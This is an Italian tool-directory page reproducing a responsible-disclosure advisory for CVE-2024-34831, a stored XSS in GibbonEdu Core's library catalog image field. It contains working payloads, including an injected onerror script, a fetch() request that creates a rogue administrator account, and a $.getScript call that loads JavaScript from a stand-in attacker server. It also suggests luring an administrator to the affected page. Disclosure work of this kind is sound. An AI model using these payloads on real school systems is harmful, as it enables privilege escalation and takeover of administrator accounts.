Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/enzored/cve-2024-34831
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubenzored/cve-2024-34831

CVE-2024-34831

Divulgazione di CVE-2024-34831

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-34831 XSS Vulnerability in GibbonEdu Core v26.0.00 leading to Privilege Escalation

Gibbon è un fantastico sistema di gestione scolastica open source completo. Molto lavoro è in corso per rinnovare la base di codice piuttosto vecchia.

Autore: Christian Bajada

1. Vulnerabilità

Il parametro imageLink durante la modifica/invio di nuovi libri (/modules/Library/library_manage_catalog_editProcess.php) è vulnerabile a XSS. Gli utenti con il permesso di gestione del catalogo possono sfruttare questa vulnerabilità causando l'esecuzione di script arbitrari per utenti con permessi più elevati, portando all'elevazione dei privilegi.

2. PoC Scenario Semplice

  1. Naviga su Learn > Library > Manage Catalog
  2. Modifica uno degli elementi del libro.
  3. Il campo Image Link non è adeguatamente sanificato e ci permette di eseguire Javascript arbitrario. Modifica il Link dell'immagine in [http://x](http://x/)" onerror='alert(1)' e il codice alert verrà eseguito al caricamento della pagina quando si carica la pagina della libreria:

Gibbon_XSS_1

Gibbon_XSS_1

3. PoC per Elevazione dei Privilegi

Questa sezione spiega come questa vulnerabilità possa essere utilizzata per qualcosa di più pericoloso di un semplice popup alert(1). Intendiamo indurre un amministratore connesso a creare senza problemi un altro amministratore accessibile dall'attaccante.

Il campo imageLink è troppo piccolo per permetterci di invocare funzionalità significative sulla piattaforma Gibbon. Quello che possiamo fare è semplicemente ospitare il Javascript altrove e farlo scaricare ed eseguire dal browser. La mancanza di CSP lo rende possibile.

  1. L'utente malintenzionato costruisce il payload per creare un utente amministratore come segue e lo colloca in una posizione accessibile pubblicamente, ad esempio https://<yourserver.com>/payload.js. Il codice seguente, se eseguito da un amministratore, creerà un utente amministratore chiamato hexthecat. Il codice invoca la funzione su Gibbon Core per creare un nuovo utente con tutti i parametri richiesti.
root@kitploit:~
fetch('./modules/User%20Admin/user_manage_addProcess.php', { method: 'POST', body: new URLSearchParams({ title: 'Mr.', surname: 'Cat', firstName: 'Hex', preferredName: 'Hex', 'officialName': 'Hex', gender: 'M', dob: '01/04/2024', gibbonRoleIDPrimary: '001', username: 'hexthecat', passwordNew: 'Hexed001', passwordConfirm: 'Hexed001', status: 'full', canLogin: 'Y', passwordForceReset: 'Y' }) });
  1. L'utente malintenzionato con permesso di gestione del catalogo inserisce il seguente imageLink per un libro (mantenendo l'originale e aggiungendo la parte di caricamento dello script):

http://books.google.com/books?id=SluXuAAACAAJ&printsec=frontcover&img=1&zoom=1&source=gbs_api" onmouseover="$.getScript('https://<yourserver.com>/payload.js')"

  1. L'amministratore naviga nella libreria.

È necessario attendere fino a quando l'amministratore naviga nel catalogo della libreria o convincerlo tramite messaggistica istantanea, email o qualsiasi altro canale.

L'atto di passare il mouse sopra (onmouseover) l'immagine del libro farà sì che il payload venga prelevato dalla posizione (in questo caso <yourserver.com>) e venga eseguito. Questo provoca la creazione di un utente amministratore a cui l'utente malintenzionato può ora accedere. È possibile utilizzare anche il listener 'onerror' per far eseguire immediatamente il payload senza dover passare sopra l'immagine.

Puoi controllare l'utente creato nel menu ADMIN > User Admin

Gibbon_XSS_2

4. Divulgazione Responsabile

Pubblicato secondo le linee guida per la divulgazione responsabile https://github.com/GibbonEdu/core/security.

  • 06 maggio 2024: Vulnerabilità segnalata e riconosciuta dal mantainer di GibbonEdu.
  • 15 maggio 2024: Numero CVE assegnato da MITRE.
  • 10 settembre 2024: Avviso pubblicato.
Scarica lo strumento